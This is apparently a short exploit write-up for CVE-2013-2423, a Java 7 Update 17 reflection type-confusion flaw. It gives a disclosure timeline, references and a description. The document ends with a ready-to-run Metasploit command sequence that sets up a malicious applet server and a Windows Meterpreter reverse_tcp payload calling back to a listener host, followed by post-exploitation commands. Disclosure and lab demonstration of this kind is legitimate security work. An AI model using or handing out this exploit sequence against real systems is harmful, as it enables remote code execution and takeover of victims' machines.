Timeline :

Vulnerability discovered and reported to vendor by Jeroen Frijters
Vulnerability corrected in April CPU the 2013-04-16
Vulnerability publicly disclosed by Jeroen Frijters the 2013-04-17
Metasploit PoC provided the 2013-04-20

PoC provided by :

Jeroen Frijters
juan vazquez

Reference(s) :

Oracle Java April 2013 CPU
CVE-2013-2423
OSVDB-92348
BID-59162

Affected version(s) :

JDK and JRE 7 Update 17 and earlier

Tested on Windows XP Pro SP3 with :

JDK and JRE 7 Update 17

Description :

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit doesn’t bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.

Commands :

use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo